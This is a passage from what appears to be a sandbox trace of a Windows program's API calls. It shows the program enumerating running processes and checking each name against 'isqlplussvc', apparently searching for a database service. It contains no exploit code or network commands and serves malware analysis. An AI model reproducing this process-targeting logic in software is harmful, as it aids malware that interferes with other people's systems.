dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.600] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3566c10 [0093.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3566c10, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0093.600] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0093.600] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.600] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0093.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.601] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569360 [0093.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3569360, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0093.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0093.601] StrStrIA (lpFirst="SearchUI.exe", lpSrch="isqlplussvc") returned 0x0 [0093.601] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0093.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.602] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3566c90 [0093.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3566c90, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0093.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0093.602] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="isqlplussvc") returned 0x0 [0093.602] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.603] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35693d8 [0093.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35693d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.603] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="isqlplussvc") returned 0x0 [0093.603] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0093.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.604] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35693a8 [0093.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35693a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0093.604] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0093.605] StrStrIA (lpFirst="pending.exe", lpSrch="isqlplussvc") returned 0x0 [0093.605] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0093.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.606] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566ae8 [0093.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3566ae8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0093.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0093.606] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="isqlplussvc") returned 0x0 [0093.606] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0093.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.607] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566d50 [0093.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3566d50, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0093.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0093.607] StrStrIA (lpFirst="swing prefer.exe", lpSrch="isqlplussvc") returned 0x0 [0093.607] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0093.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.608] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566908 [0093.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3566908, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0093.608] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0093.608] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="isqlplussvc") returned 0x0 [0093.608] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0093.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.609] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569488 [0093.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3569488, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0093.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0093.610] StrStrIA (lpFirst="nights-attending.exe", lpSrch="isqlplussvc") returned 0x0 [0093.610] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.611] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3569390 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3569390, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0093.611] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0093.611] StrStrIA (lpFirst="installed.exe", lpSrch="isqlplussvc") returned 0x0 [0093.611] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0093.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.615] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566a48 [0093.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3566a48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0093.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0093.616] StrStrIA (lpFirst="references compounds.exe", lpSrch="isqlplussvc") returned 0x0 [0093.616] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0093.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.620] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569608 [0093.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3569608, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0093.620] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0093.620] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="isqlplussvc") returned 0x0 [0093.621] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0093.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.623] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569708 [0093.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3569708, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0093.623] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0093.623] StrStrIA (lpFirst="registered try.exe", lpSrch="isqlplussvc") returned 0x0 [0093.623] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0093.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.624] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35669d0 [0093.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35669d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0093.624] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0093.624] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="isqlplussvc") returned 0x0 [0093.624] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0093.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.625] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569348 [0093.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3569348, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0093.626] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0093.626] StrStrIA (lpFirst="invite.exe", lpSrch="isqlplussvc") returned 0x0 [0093.626] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0093.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.627] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569378 [0093.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3569378, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0093.627] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0093.627] StrStrIA (lpFirst="idol.exe", lpSrch="isqlplussvc") returned 0x0 [0093.627] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0093.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.663] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566b10 [0093.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566b10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0093.663] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0093.663] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="isqlplussvc") returned 0x0 [0093.663] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0093.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.664] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566b38 [0093.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566b38, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0093.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0093.665] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="isqlplussvc") returned 0x0 [0093.665] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0093.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.666] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35693c0 [0093.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35693c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0093.666] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0093.666] StrStrIA (lpFirst="powell_jane.exe", lpSrch="isqlplussvc") returned 0x0 [0093.666] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0093.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.667] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569468 [0093.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3569468, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0093.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0093.667] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="isqlplussvc") returned 0x0 [0093.667] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0093.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.668] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3569330 [0093.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3569330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0093.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0093.668] StrStrIA (lpFirst="gainedshape.exe", lpSrch="isqlplussvc") returned 0x0 [0093.668] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0093.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.669] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569808 [0093.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3569808, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0093.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0093.669] StrStrIA (lpFirst="opens-versions.exe", lpSrch="isqlplussvc") returned 0x0 [0093.669] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0093.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.670] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566958 [0093.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3566958, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 